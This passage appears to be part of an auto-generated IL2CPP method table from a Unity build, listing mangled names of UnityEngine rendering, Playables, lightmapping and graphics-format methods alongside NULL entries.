ScriptableRenderContext_GetCameras_Internal_m852016B3544E3ED5FEFB9695EC175622A5B6A8C8,
ScriptableRenderContext__ctor_m10159F14BB69F555C375E13BB77A1898FDB42FA5,
ScriptableRenderContext_GetCameras_m9B2329F79132EE49B719560AD739FD3601C44189,
ScriptableRenderContext_Equals_mBFDA5815F2B6ABA9B16503DA906B8BA42078718D,
ScriptableRenderContext_Equals_m99E5A233945DFC3B9A786F2413ECE68E5019AB88,
ScriptableRenderContext_GetHashCode_mA1EE09239F1ACFC29A2ADB027D5E76E690510207,
ScriptableRenderContext__cctor_mC3B278224EBBC167C90B484295DB8563BED64D6F,
ScriptableRenderContext_GetCameras_Internal_Injected_mE2D2D9C806F8AEC694BF42009B6878765F6A28FE,
ShaderTagId__ctor_m4191968F1D2CE19F9092253EC10F83734A9CFF5B,
ShaderTagId_Equals_m02826F7AFC63AA3AE5DB14F7A891F8F173FD9A33,
ShaderTagId_Equals_m932EFCC38C276EEB2784BBC866330F4C595F52E0,
ShaderTagId_GetHashCode_mF5E3A1F96CBDFDCEFABE1B56125EBBA6E3B9EFEF,
StencilState_set_enabled_m6DC861C699D1044E896E833D2DAE69B82F796564,
StencilState_set_readMask_m1BA8F9033413889D4E77DA343DC0029566A9BB9B,
StencilState_set_writeMask_m94471C671E03D42F36DA61436B1068B362375D65,
StencilState_set_compareFunctionFront_m1388C37901DAB6AF9D23C0F01946DCCE19BC9BFC,
StencilState_set_passOperationFront_m1F15CC29366DAEAA6CCE1DB0622C70D6ECC5A3EB,
StencilState_set_failOperationFront_mADCECAE5D2E75ABAE51650F1F314E661D09C2CD6,
StencilState_set_zFailOperationFront_mC7D8F0A08B9AEC4203BD6B352CB795E8011EFBB6,
StencilState_set_compareFunctionBack_m8AF73F4E8FC95A46D33E3192C50702D2AA15D61D,
StencilState_set_passOperationBack_m4B1395FE21F5B5C809DC6F31D5824A90E05ED220,
StencilState_set_failOperationBack_mD279271DD1F99EE5B8BC19F5AE60988E6C6F0E4A,
StencilState_set_zFailOperationBack_mC092ABD8A5EA87245640A10E54C6A1990C4F6864,
StencilState_Equals_m9FFB8A41D8838FD128875CB2D4DAA760C6DF1051,
StencilState_Equals_mEA45A5D2BF2223B15EE0FB8BCEDBA9CB534ADF4B,
StencilState_GetHashCode_mB4A02DEE780377C853D16FFF49CCB9D9F4F711A5,
SupportedRenderingFeatures_get_active_mEE06ADFCF05E5111ED1D42BA3E893F8386C96480,
SupportedRenderingFeatures_set_active_m3AC4375082D83077EB449AD20EC27B6B458D2EC4,
SupportedRenderingFeatures_get_defaultMixedLightingModes_m7F9FDF9012EC41E36466613C8A9103D74666CBC4,
SupportedRenderingFeatures_get_mixedLightingModes_m929C0CE80A4990993EBCAB8B46C1E273A0829137,
SupportedRenderingFeatures_get_lightmapBakeTypes_m1311A5AD5BE1A6BA3251238C893D7D340358C156,
SupportedRenderingFeatures_get_lightmapsModes_m925D670110EF7109A26BE1B228066E1201FAAE38,
SupportedRenderingFeatures_get_enlightenLightmapper_mF7C756BBD4E605DD047BD502DFF8569C4CEE8F27,
SupportedRenderingFeatures_get_enlighten_m6F973FEB7CCF0BB1B7A2F25317EADC5F6FD95ED6,
SupportedRenderingFeatures_get_rendersUIOverlay_m657FFFC5B360F7BCE9964EF50E7449779224AEFC,
SupportedRenderingFeatures_get_autoAmbientProbeBaking_m42E98E922511B1CF790FC414C9A85D70DFACA2C8,
SupportedRenderingFeatures_get_autoDefaultReflectionProbeBaking_mFDB934E6645FA5CA95E1F0BEF4A12345A1025207,
SupportedRenderingFeatures_FallbackMixedLightingModeByRef_m79883C2C0259DA7AF9B43DC1C6621EF8C2C882AB,
SupportedRenderingFeatures_IsMixedLightingModeSupported_m1FAB223D6188E1830288D98A7622B549F545881A,
SupportedRenderingFeatures_IsMixedLightingModeSupportedByRef_mF97CED14CB16F3193BCB30A9A37F7B8EDFB7AC4D,
SupportedRenderingFeatures_IsLightmapBakeTypeSupported_mCBE5A13BA92867DA66DCDF23121473FD4B879CA4,
SupportedRenderingFeatures_IsLightmapBakeTypeSupportedByRef_mC712C491E3596EE8C0655538CF08E042EB7B34C8,
SupportedRenderingFeatures_IsLightmapsModeSupportedByRef_m494FCDC548A34F66D7A71A81D0C38EFBF6459AEB,
SupportedRenderingFeatures_IsLightmapperSupportedByRef_mFC8FCBE9FA4D3E210CBB8BA711FF0AE72648285A,
SupportedRenderingFeatures_IsUIOverlayRenderedBySRP_m1AE190FFF1E73E64DC2F9CF21F44656056F2B2C9,
SupportedRenderingFeatures_IsAutoAmbientProbeBakingSupported_m2D00A73CB387BEDAFADF211A0E8579ACB544A6BC,
SupportedRenderingFeatures_IsAutoDefaultReflectionProbeBakingSupported_m226DAFBB7099877D23B8273789A1FAC2130DDCC0,
SupportedRenderingFeatures_FallbackLightmapperByRef_mE8CE8E18176F1DF7FB7A315C3FF41029BFBDCA63,
SupportedRenderingFeatures__ctor_mF7728980F81142B7BD45FBB25AB001B17A4BF0ED,
SupportedRenderingFeatures__cctor_m95816EF1A9511038798E9D7FF161E929E0217DE0,
FrameData_HasFlags_m268F3C0E03481E2F7217CEB6153C072AB0A68C1C,
FrameData_get_deltaTime_m522E00CB1B4DA759A5121778A7688DA07735C1F8,
FrameData_get_effectiveSpeed_m49D7C9FB90C9B640B64D701B026DC26540BC25B9,
FrameData_get_evaluationType_m0212C6B9A3C3AD09BA24DD4291A9FB528BFD0842,
FrameData_get_seekOccurred_mC8325617A69EA31B70169D921E258AC60B2750D2,
FrameData_get_timeLooped_m88F002C13ED791E65D9F5705AAD05C19C505918B,
FrameData_get_timeHeld_m1213876DD47660CEA565831282ACA4477BC6644F,
FrameData_get_output_mB5B10130E39676C78F53E6194390B01B87D54FBF,
FrameData_get_effectivePlayState_m58201D8BB3B3489399055AC4D1264007552F2BAB,
FrameRate_get_dropFrame_mC8BFEB9E9E33328497040C4D02EAF1F0DC84AFF4,
FrameRate_get_rate_mF21BC02932E30CCC1832FE1B3C08FE6679F95406,
FrameRate__ctor_m9DF0B1521A85AE2CD542C19C1C253301B389CA71,
FrameRate_IsValid_m8F983C71BC91E1AEF857517C4D344D9FCEAE2851,
FrameRate_Equals_m71B1BAAEDC9E1096965764135FF45A1C464639E6,
FrameRate_Equals_m318AFC57E72479688AFA71ECFCB8F2113BC0044C,
FrameRate_op_Equality_m20786BB4FF6E0B7F40F935A945AF8CA63D77FEC4,
FrameRate_GetHashCode_mD760D080786680B77E3E8F059950F48EAAF6A819,
FrameRate_ToString_m899E2A85E7CE55B74522F23706508BD4AF18934F,
FrameRate_ToString_m72358F5840A02CA9E1B5F326575596E2B094BB56,
FrameRate_DoubleToFrameRate_mBF7B8DC218B347F607E379E7BD9C44DFA69C4B61,
FrameRate__cctor_mCF386A3D08C0E45EFFE95416C146DB4685D0E381,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
Playable_get_Null_m13BA20519948F798D105B0F5F4FCF0D738CEA5A7,
Playable_Create_m599EF0161E10B4244461F3335A6294AEBBA02123,
Playable__ctor_mD2EB35E024816AEED68795D0124EAB30E05BF6C4,
Playable_GetHandle_m39356D23E849DC5428B262092657662C064E04F8,
NULL,
Playable_GetPlayableType_mF7103BE376DCD61F54669681AE7BB7D6963D6D43,
Playable_Equals_mD72D3DB892B8867A0E7BAC032A16C08616EEFF86,
Playable__cctor_m75FC3E0FF1F2C5AD39A0AE7F2967AC5D0ABAEF0A,
NULL,
NULL,
NULL,
PlayableAsset_get_duration_m4668A767DDB780565E6506E63B4797B820405CFE,
PlayableAsset_get_outputs_m5760B1B5EE08B0327FA7D90AE92C94227B1C993C,
PlayableAsset_Internal_CreatePlayable_mC2DE0964868E459854F8B7564830BDF47424CD65,
PlayableAsset_Internal_GetPlayableAssetDuration_m88EC64D33EDDDCF5DD24FF233BEC2013DFDDF622,
PlayableAsset__ctor_m36B842356F02DF323B356BAAF6E3DC59BA9E1AB8,
PlayableBehaviour__ctor_mA6202DCD846F0DDFC5963764A404EE8AFABEA23A,
PlayableBehaviour_OnGraphStart_mB5944807796239EFB530022539674C4E4D185D65,
PlayableBehaviour_OnGraphStop_mF80DFC8A3C2D2CA9299011D9E871ED6A8A9586CA,
PlayableBehaviour_OnPlayableCreate_m22B0F0051A677A523C5702AABC6B1C9D358E90B8,
PlayableBehaviour_OnPlayableDestroy_m3DB0AF7BD9689DA1BCCBBFD19BDD544143027C3C,
PlayableBehaviour_OnBehaviourPlay_m05F6FCCBC6E8FB4BA0BE2690045AF28BF95C6FE2,
PlayableBehaviour_OnBehaviourPause_m431A7BD2EE99C1862563FEA37E20C365B753930B,
PlayableBehaviour_PrepareFrame_m33FED1E870D350D8276712A2CD75118FEFAA86BD,
PlayableBehaviour_ProcessFrame_mB80DDB2AB5D7EC0D3B9A466D37BE8556F6BBD2A0,
PlayableBehaviour_Clone_m6A5B052F4ECA2ADED5937A4843777F52CCD33EE8,
PlayableBinding_get_sourceObject_m195E6C4C3DF88BD89A2DE3923646B9A013310C09,
PlayableBinding_CreateOutput_mE29B8B4AE0857C038D6DCA6824A307C60E2DD7C6,
PlayableBinding_CreateInternal_m4CAAB6FB532F76FEA5BDD52D855F36BDA35517B3,
PlayableBinding__cctor_m60F178A142DCD473565A15003603A696FE3EBC02,
CreateOutputMethod__ctor_m5A339017CD8ECB0140EB936FD2A5B589B20166B4,
CreateOutputMethod_Invoke_mEC7DC5D9A9325BFFB17C248AE9738637704B89CC,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PlayableGraph_GetRootPlayable_m3BA0011AD6B13FCE5D58EA3E9BB17BE84319B53C,
NULL,
PlayableGraph_Evaluate_m5E8756A5AB34EB7F9FC7682932D4BD6BE418352A,
PlayableGraph_IsValid_mB608FD2CEDAA27C31C34DF4639CF98199ECDC3CA,
PlayableGraph_IsPlaying_m9289A7D3CBD3A73051568C20F384C1D4FBBA89E0,
PlayableGraph_Evaluate_m56DAAF530D0A6079FCBCFE86EF5E3E33374A22A7,
PlayableGraph_GetResolver_m7869599485E96C9D09E0680FA25099E9B2789A47,
PlayableGraph_GetPlayableCount_m69E1448E840367C9A1D05BE0FB1908BD0C04B809,
PlayableGraph_GetRootPlayableCount_mAD4CB33AEDB21181CAE1312C3D23CA14E52FFA45,
PlayableGraph_SynchronizeEvaluation_m9911E65EE4FE46BAE375EF11C884136C840760C0,
PlayableGraph_CreatePlayableHandle_mF90D606A614FB603DBFFE4E87C325F8CC59BED67,
PlayableGraph_CreateScriptOutputInternal_m7B8A726419E5A7E5C07436BC168CE28B2D970393,
PlayableGraph_GetRootPlayableInternal_mB01EE3DE1FED4EB160B5EA367448521ED0F36165,
PlayableGraph_IsMatchFrameRateEnabled_mC6D005B2F581E49DEA0037C8811CEA771C3CE1C3,
PlayableGraph_GetFrameRate_m81DF8FC361E09CC2A2FE2350E48FF2B1E4AFA990,
PlayableGraph_ConnectInternal_m86DBDCCD0D8D5B1734EA7E90268F057A6E52525A,
PlayableGraph_IsValid_Injected_m38C19708A13E45B47938245C10230A5AE3EA3A7C,
PlayableGraph_IsPlaying_Injected_m6853B8C3823B45DFC32C9F23D12D768945D27417,
PlayableGraph_Evaluate_Injected_m25190F19B7C05D0E3F06C4D61C15C20C76A692D9,
PlayableGraph_GetResolver_Injected_m46650234C8949E260D7E2F3A67C9EC184A6809F5,
PlayableGraph_GetPlayableCount_Injected_m1F7B7B6400DAEEF218EB40D31FAF4E77ECB58AD3,
PlayableGraph_GetRootPlayableCount_Injected_m361930597784E2C478CADDBCBCFE32BA998E2F8C,
PlayableGraph_SynchronizeEvaluation_Injected_m150E4F7D7993DBD85CF30D143D964DA68A8097E5,
PlayableGraph_CreatePlayableHandle_Injected_m6DAE7F87EF01E3C6429FEC6AAEA0A264128B3E61,
PlayableGraph_CreateScriptOutputInternal_Injected_m65A2EECE96C095AEC9CF11474AFF72EBC30472AA,
PlayableGraph_GetRootPlayableInternal_Injected_m80A0E83F214A01F5BE69D63AD56A162B9E74CC32,
PlayableGraph_IsMatchFrameRateEnabled_Injected_m61515BE12764FA8F8DB31DFAE164594E8C700CC6,
PlayableGraph_GetFrameRate_Injected_m0EBBE79E8D3E7A0EE83625E8667C8E03FDC0E342,
PlayableGraph_ConnectInternal_Injected_mDBBC929E39B82AC79315C637E859D814BE642F07,
NULL,
NULL,
PlayableHandle_get_Null_m32D9E05C019AC0153C26392C7946F0A1654D1217,
PlayableHandle_GetInput_m3F42E2CF0D7DFA2396295133D02622C1BE3A8633,
PlayableHandle_SetInputWeight_m8647C2593A24870E429A0832FC26EE2241CC302E,
PlayableHandle_GetInputWeight_m0C5D7A870D6DDE9F1A5193907ADCA0335DC6207A,
PlayableHandle_op_Equality_m5E9B847A9D36875C78902727FE36FBEDA4D2D3B9,
PlayableHandle_Equals_m60AD76B7D38CA989AE84501B2E9F9ED5CB5F9670,
PlayableHandle_Equals_m81BA0E127133DFF3E45DA61D185FDF48E16BCF45,
PlayableHandle_GetHashCode_m10FB32ECDC0B9D7BDAEA9E3B76BDDF4614F4EF4F,
PlayableHandle_CompareVersion_m802DDE7AF60A7492B1BCF3FDBE00198605001CD8,
PlayableHandle_CheckInputBounds_m5A5D02E53EF84B63F75DBB414906923677EED1E3,
PlayableHandle_CheckInputBounds_mEA09337758C333586D6B7B4A5D1E10852ECFC1D8,
PlayableHandle_IsValid_m07631D12846BAAF2CC302E69A28A44BFE9EB5098,
PlayableHandle_GetPlayableType_mD9750F1B85DF086F52641D6AB85789601486B686,
PlayableHandle_SetScriptInstance_m479F7C03A25E77284BE1949CF5EABE903B9B26EE,
PlayableHandle_GetPlayState_m14547B804BB9B9B9E2B20B3F0975334CC99E778F,
PlayableHandle_Play_m1EF8E1105EB6A4A9B0D6638A57CDCBCEEDC6FB2D,
PlayableHandle_Pause_m75833A31BA17AC8900736C6F5AC778D033001B32,
PlayableHandle_SetSpeed_m39D426AE0DF93F876C2C1EDF9417C11B97A305E9,
PlayableHandle_GetTime_m27CB24B86EF0E6A4BD2C53907A677059B5D2BD5D,
PlayableHandle_SetTime_m6D255AB6779F3DC278813F1C016FE4EBC9F4B1E4,
PlayableHandle_IsDone_mF5DAB54F941BC13799577396526E3901CF639DE6,
PlayableHandle_GetDuration_mE3CF9C12CA5A186288A7F1981A92F043100E02A7,
PlayableHandle_SetDuration_m4E07F9F3A90B2F3CE10325D9F405993F03CCA08B,
PlayableHandle_SetPropagateSetTime_mD1458DFF49EF07D73884A9BBAC31358579C8931B,
PlayableHandle_GetGraph_m03AFC9F0B66AC13A120EC37F6964200C9973CE24,
PlayableHandle_GetInputCount_m7FE60883E4B7C9AF7D39F28A044924ADBD5E5121,
PlayableHandle_SetInputCount_m6067CD3616C428F777903FCBFD789060A2185DEE,
PlayableHandle_SetInputWeight_mCC570E6D826D79987CC4E021DA9E7C0B700C0AC1,
PlayableHandle_GetPreviousTime_m0C6881E900DF5FE7281699876DFE48BA64DEC1BF,
PlayableHandle_SetTraversalMode_m5302D6FC1935F2EF97E25DF58B402CC8700DE03D,
PlayableHandle_GetTimeWrapMode_m3C4CF421B7470E04537C45092DA9A1D242A5D1B4,
PlayableHandle_SetTimeWrapMode_m88B50CE0AABE0183BBF12ACEC5E84CBEDAB76C2F,
PlayableHandle_GetScriptInstance_m14D182ED7BEB2AAE1ADD86189A687FF0F86FA925,
PlayableHandle_GetInputHandle_mB9DAEF700C72515D7CA640F71C51A09C08DAD380,
PlayableHandle_SetInputWeightFromIndex_mF56AA0C0055C18FF46EF8E315331FDF45D832752,
PlayableHandle_GetInputWeightFromIndex_mF50333BE4F3BD48CCF6A431BC6B99D4CBF131CD6,
PlayableHandle__cctor_mD503717F819B6D5D115A206B2D88E8B1E5AEADA5,
PlayableHandle_IsValid_Injected_mFD1FB7096A30373EAEB9B99406CD836169CF24BB,
PlayableHandle_GetPlayableType_Injected_m5A90A1EC6109FBB31BD9342009B93A9B3913814B,
PlayableHandle_SetScriptInstance_Injected_m9AD355660347CD4868E86C911E4A0A7B332E52CC,
PlayableHandle_GetPlayState_Injected_m0EED65EC2553F18E6CCFAF3DC9C5928E200657CA,
PlayableHandle_Play_Injected_m52A0C95CCC07769DA0AE72F221DE9344244156CB,
PlayableHandle_Pause_Injected_mD84BD0C12D89C0B19CF78851F43565DB13D146B9,
PlayableHandle_SetSpeed_Injected_m40D6D16DE307C6CF2B1D698C58E80BA4D75D5E1C,
PlayableHandle_GetTime_Injected_mF19D25B42A5962A1E3F2294837A12A2A58CD9555,
PlayableHandle_SetTime_Injected_m4109FB6C48745EB197B5E047EFAD722A32A723AA,
PlayableHandle_IsDone_Injected_m9FEF721F629DDE1DE068F78E1F57134471984B5A,
PlayableHandle_GetDuration_Injected_m48BFFA2CAFCA182DC64CB8296784AC84300F5184,
PlayableHandle_SetDuration_Injected_mDF7D8FD56D90F357DDFBE2CA1BFF7466819E2E3C,
PlayableHandle_SetPropagateSetTime_Injected_mB04F6DFDE3A083B6267E8728BC548AD89612CA77,
PlayableHandle_GetGraph_Injected_mF5623BF301E4EF78AFF5241699377A5C7C83B002,
PlayableHandle_GetInputCount_Injected_mE5D803A20E99FAB9708043092D6A0EC77C244400,
PlayableHandle_SetInputCount_Injected_mEBC9A90F3A5C51B38C053D0AC008C8D58593621A,
PlayableHandle_SetInputWeight_Injected_m69E47545E27F77A2EE59625AC4CD748FACAD1D24,
PlayableHandle_GetPreviousTime_Injected_m1BCE7E9C90BE79A7D233A26E0A87E705E3199368,
PlayableHandle_SetTraversalMode_Injected_mD62912B271C102CC4DC38117E1665F0DE9DA8227,
PlayableHandle_GetTimeWrapMode_Injected_mBD72D109CA54C1E6148889588D3C268A29F1389C,
PlayableHandle_SetTimeWrapMode_Injected_m4FEC7834E661A7962229B6E42A8B972B3B654802,
PlayableHandle_GetScriptInstance_Injected_m4938B24C8483B6C11AA1114AB8E5178EA8906E3E,
PlayableHandle_GetInputHandle_Injected_mD6946C7FC2EC360B1006C3EA10CE680037E53605,
PlayableHandle_SetInputWeightFromIndex_Injected_mACBF5DC80B096E544CFB430CA9CB1669BAEF9EB9,
PlayableHandle_GetInputWeightFromIndex_Injected_m62654EEEE4DE8FA291803CA5AC85D3554809862C,
PlayableOutput_get_Null_mA7624276D8DE8874A9179656D6AB5D6E4AB1DD7F,
PlayableOutput__ctor_m55FBB20EC479F67641835EA48D84A1AB3DF39747,
PlayableOutput_GetHandle_m12FF2889D15884CBEB92A6CB376827EBA5A607BF,
NULL,
PlayableOutput_Equals_m4CC730818751114DC5643600B5FE20243F4B7121,
PlayableOutput__cctor_mA6BE3612E38131B9366284B8D0F96AABD4271D41,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PlayableOutputHandle_get_Null_m4ECA1C6CE17D440F3EC5E2FD03E4D59FF20554DE,
NULL,
PlayableOutputHandle_GetHashCode_mC2FAF756D71026E3AF4492157EDAE7186429B079,
PlayableOutputHandle_op_Equality_mAF77E9AD09CFBA177D85605ACF0B659F7DEE80E4,
PlayableOutputHandle_Equals_mB9106CB9333E0BF4C893E43AD7A23B64471CC21A,
PlayableOutputHandle_Equals_mF5C23882B2A007186F00EB3D23E9BD6664E8DAE6,
PlayableOutputHandle_CompareVersion_mA7BD9897370F05F9C192AC972A5ED7170C6D945C,
PlayableOutputHandle_IsValid_mA94C343D72B72C3B1C7636C93A8DB5EA71691312,
PlayableOutputHandle_GetPlayableOutputType_m5FA19BC37FD64EC6C2174B6DA6CB202F5451C108,
PlayableOutputHandle_SetReferenceObject_m898B8810539BBD3B4B4382CD436FE84EC60AF77F,
PlayableOutputHandle_SetUserData_m23E8BB63D93E67DD981C9045D610C6B2289F435B,
PlayableOutputHandle_GetSourcePlayable_m6D142AAB19E92AAD5D7C4F96087F27B0F8185627,
PlayableOutputHandle_SetSourcePlayable_mBC96BBEB1838444B937337B985FFD9A6084A6A8D,
PlayableOutputHandle_GetSourceOutputPort_m9E9AA2A0E62DFBA3570DC262AFECD08FF0E71D1F,
PlayableOutputHandle_SetWeight_m6A8B44B22EFA5628A90A87085FD86D478913093F,
PlayableOutputHandle_PushNotification_m97131909E6A9A76742074B4023CA6C94A2A95610,
PlayableOutputHandle_AddNotificationReceiver_m2E93B0DB0A7A98AECFDAEB02D610B45617FC357C,
PlayableOutputHandle__cctor_m3739C240727C7DE5BE3C36E63D5114227F1EB09D,
PlayableOutputHandle_IsValid_Injected_mF0FAAF61F1FA4CC6C3D6AF597D0692C132F7D2C9,
PlayableOutputHandle_GetPlayableOutputType_Injected_mC562665DE7A01A092A5AFB950140E268DFE0E04F,
PlayableOutputHandle_SetReferenceObject_Injected_m7EF0661333F1DD72D9BFBACDEF3F495D82706707,
PlayableOutputHandle_SetUserData_Injected_m17952181084B4E26562511002CC4D6A8C5F596B4,
PlayableOutputHandle_GetSourcePlayable_Injected_m3F7DA44437F3A3EB99B21ED7A14DC1D0B5E29726,
PlayableOutputHandle_SetSourcePlayable_Injected_mEB3496039206A78B1C1E95071859A28D5D34815F,
PlayableOutputHandle_GetSourceOutputPort_Injected_m6D2726A46C963B5AACAD30F7ACEF7B6C544FA332,
PlayableOutputHandle_SetWeight_Injected_m5EB0E09003315B08698732CAB7E38C6E6A4B6F54,
PlayableOutputHandle_PushNotification_Injected_m417E0D4D14FE3A83C0E7A7BFA4A04821F35850EA,
PlayableOutputHandle_AddNotificationReceiver_Injected_mADB405E71B04655BC01DF4299A5D54CF5913A981,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
ScriptPlayableBinding_Create_mE90DA29FB018C88259FB06424E0998C6226485B7,
ScriptPlayableBinding_CreateScriptOutput_m0ECD710F6E6AF4721AA334AF205095B5376ED505,
ScriptPlayableOutput_Create_m3C9D4346965F70C8052FBB29AEFC3E38BAB62771,
ScriptPlayableOutput__ctor_m867BA54A9DCDFCA187EA927F75A6903D0F8FF2C4,
ScriptPlayableOutput_get_Null_mAAF09827EE8351C04E4929B6B2EF1BD2F615B5C9,
ScriptPlayableOutput_GetHandle_m21A3E97125928298D6942D0EDE58ADAD018E4E93,
ScriptPlayableOutput_op_Implicit_m51337F5460513846D79F2E9C0C33311FBF45B400,
LinearColor_get_red_m376617B8E3156420835055189BB28D953FE46A2A,
LinearColor_set_red_m0ACFCEDDD205A6F235BE95936816E92898B01B52,
LinearColor_get_green_mCCE90A662234EE3605368F3AEC14E51572665AE5,
LinearColor_set_green_mBD9C7EA6415DC54B3F6B643C3CD02B71565F0694,
LinearColor_get_blue_mAFAEA5D5590DD14CFC48BC18DF4BFEBBDCB0A99A,
LinearColor_set_blue_m3FEEAF946772BB177733B67D9DA4B72D84874375,
LinearColor_Convert_mB94629473570EEFB0A92B706C0F18AA17FB05803,
LinearColor_Black_m29E930EAED6270F37E98DCFDE78417DACEBA26A3,
LightDataGI_Init_m112DEBB76EC57AC52E6384C97A3E8B2EAA867207,
LightDataGI_Init_mACE06E00CC639CA89F3847E9DB55FD0F00812A7A,
LightDataGI_Init_m0A999D118CDCBDA99B9E24231ED057D943C9C67B,
LightDataGI_Init_mDC887CA8191C6CADE1DB585D7FEB46B080B25038,
LightDataGI_Init_mB2D1C73EDFEA6815E39A0FE3ED2F7BF9A7117632,
LightDataGI_InitNoBake_mBDF2EFB22D4BEE63B6F25F4EE9F1522D2866ED43,
LightmapperUtils_Extract_m3D10A882381C72E4BC640EFA43BEB204C8E31A92,
LightmapperUtils_ExtractIndirect_mEC02DC55F36EA834577CE8C4799B0CD58584AB13,
LightmapperUtils_ExtractInnerCone_m546DD25E1DEFA2B7EECF8D0C5AB7B46F70426138,
LightmapperUtils_ExtractColorTemperature_m5C531A8B05786E5AE7021ACD4B0A03ED11CE2882,
LightmapperUtils_ApplyColorTemperature_m54994440A9598A4048214988DC9ACA574AA40B69,
LightmapperUtils_Extract_m168917A3FFE696B6B4F2BE2ACFB5C74AEA57AAE0,
LightmapperUtils_Extract_m43F2AE128B08ACD1BE42D1A48FCE9DA5BD1BFF23,
LightmapperUtils_Extract_m923E63DD2078497852AEC688E199BE6E129B69C4,
LightmapperUtils_Extract_m6CD2C57089AE0B41970C60A597EAFBF3BE27B3A6,
LightmapperUtils_Extract_m4DB65098D5061C188791D825490B46EEE305DE6D,
LightmapperUtils_Extract_mFA23473CE371297DB7005D09ED8FF62D25B41010,
Lightmapping_SetDelegate_m71AF5AA8199040B3E901661236D09205092D0D8D,
Lightmapping_GetDelegate_m847670CDD1E8DA380930C322A5713587AF3D2396,
Lightmapping_ResetDelegate_mEFE29946965EAC2C6A5CDB5A4AF9A1B0069FAE1B,
Lightmapping_RequestLights_m212529C7EE6B36F03073D4F372B4609E5867B12C,
Lightmapping__cctor_m759E8C6D97EBF814850F73B24EC5476007DA8BFF,
RequestLightsDelegate__ctor_mFFCE8681C67A169A04BEA2201C393E1FC84CAB7D,
RequestLightsDelegate_Invoke_m01792B793691E6471596FF9B30E4D6F8EA18227E,
U3CU3Ec__cctor_m44A253B91A8449C4AA3E269C17162C626673F6C6,
U3CU3Ec__ctor_m3FBD26AEC83F79DACB13A7EF6FE5F539A71F0902,
U3CU3Ec_U3C_cctorU3Eb__7_0_m3DE1C9F0E58017EDCEAFA5FEC90132A153B492F6,
CameraPlayable_GetHandle_mA04469CA50B43AF6219F9967B8AEB310CB5455BD,
CameraPlayable_Equals_mD0FA195F3EA6511043E8F0AA1680CEB7E0E2E2CF,
MaterialEffectPlayable_GetHandle_m748319E116317E9ADD1EA36A4EDA488338471058,
MaterialEffectPlayable_Equals_mC55640B5D29F90360F9743549FABD43C5AA320EC,
TextureMixerPlayable_GetHandle_mB75CF651C6BDDF347ED6938D0F1DE4BED92BB7CD,
TextureMixerPlayable_Equals_m6838329B39779020FC3309B7406B8A0418F44FE7,
TexturePlayableOutput_GetHandle_m482C2E6F3FB849142FA7936B1B6A0B9B072A1899,
BuiltinRuntimeReflectionSystem_TickRealtimeProbes_m0CD6423541B0FCB022D55498C348A013E06E5F39,
BuiltinRuntimeReflectionSystem_Dispose_m2CDBD30196F65463B8E86AC97DA2370A4D68762D,
BuiltinRuntimeReflectionSystem_Dispose_m6B57B7E11B7A095063597FBCB0C6EE7036003F6B,
BuiltinRuntimeReflectionSystem_BuiltinUpdate_mBE5DAA71BBDC02A11C21A49284078055C7294DB0,
BuiltinRuntimeReflectionSystem_Internal_BuiltinRuntimeReflectionSystem_New_m37D7A68062DA942ACF90E1C41CF749BD948CA91B,
BuiltinRuntimeReflectionSystem__ctor_mC85D8357332DEC8325E27837409E463208ACE0E5,
NULL,
ScriptableRuntimeReflectionSystemSettings_set_Internal_ScriptableRuntimeReflectionSystemSettings_system_m668B05191322016F7A1AA39FF3A3B9B0BF8EC621,
ScriptableRuntimeReflectionSystemSettings_get_Internal_ScriptableRuntimeReflectionSystemSettings_instance_mAE76D73D6D2AED40835CED5D925ED7F8699A8560,
ScriptableRuntimeReflectionSystemSettings_ScriptingDirtyReflectionSystemInstance_m5A0AEF7B0F924A6DAF5E9762FF44D5E24A9F8762,
ScriptableRuntimeReflectionSystemSettings__cctor_m96B1BF54CF4E66158F55682A042AF76A9F40130B,
ScriptableRuntimeReflectionSystemWrapper_get_implementation_m1AFA781CCFEFE334D758AC43A9FAB9E0FB0F5C40,
ScriptableRuntimeReflectionSystemWrapper_set_implementation_mF1552E093F0F437DF191D7CBB0CF7981C36744D8,
ScriptableRuntimeReflectionSystemWrapper_Internal_ScriptableRuntimeReflectionSystemWrapper_TickRealtimeProbes_mDC08C9639CAF2D13623E82B3A9C51689D2FED2B3,
ScriptableRuntimeReflectionSystemWrapper__ctor_mCF4DB3AC3AEB1FC08CB03DD0C1733E9BDED4DF8D,
GraphicsFormatUtility_GetGraphicsFormat_m40311CC93B197CDA001DB530FA6A7145BDF704A5,
GraphicsFormatUtility_GetGraphicsFormat_Native_TextureFormat_mF6A18A9F7496D46903888ED53547C363AF19184C,
GraphicsFormatUtility_GetGraphicsFormat_m9C447321AA5B70BA35F3A23DFC772D449D92A315,
GraphicsFormatUtility_GetGraphicsFormat_Native_RenderTextureFormat_m10F2C422C5C6EEF684F56DB801358A954146B964,
GraphicsFormatUtility_GetGraphicsFormat_m86331B6F407E9C3648A3D628E2BC4059AC760DD2,
GraphicsFormatUtility_GetDepthStencilFormatFromBitsLegacy_Native_m7B1F1DEB5E33586ECC1C6784C94D51BDAB184AD8,
GraphicsFormatUtility_GetDepthStencilFormat_mF758A2225A636091FBA343397A283528ED220F54,
GraphicsFormatUtility_GetDepthBits_m7C5BCA03BDC9D6BB350456212F09680235D425BD,
GraphicsFormatUtility_GetDepthStencilFormat_mE3B35D143A479910D8CC18D52F262ACD17E81AFA,
GraphicsFormatUtility_IsSRGBFormat_m702627893B74D5F872332A624D7CBAF78D65EBC1,
GraphicsFormatUtility_IsCompressedTextureFormat_m9FDE191A4DE321B22EB81C114F8FA2F6CADC180F,
GraphicsFormatUtility_CanDecompressFormat_mED04A575F2ED1B0B4C81952AA7A117B712DA2810,
GraphicsFormatUtility_CanDecompressFormat_m7ACC154740876AA86DEB68AD574B1B11E32AF3A3,
GraphicsFormatUtility_IsDepthFormat_m3D8224CDEBB70B7448296A8E1D5812CD84958807,
GraphicsFormatUtility_IsStencilFormat_mE2080DBEEDB4D099B1D86561D23781FB6E5F7429,
GraphicsFormatUtility_IsPVRTCFormat_mC62806D7A140997254739739A47FB9716C0A79BC,
GraphicsFormatUtility_IsCrunchFormat_m397B4BA9DCEF6DF734F3F4B349A0D60B235A476E,
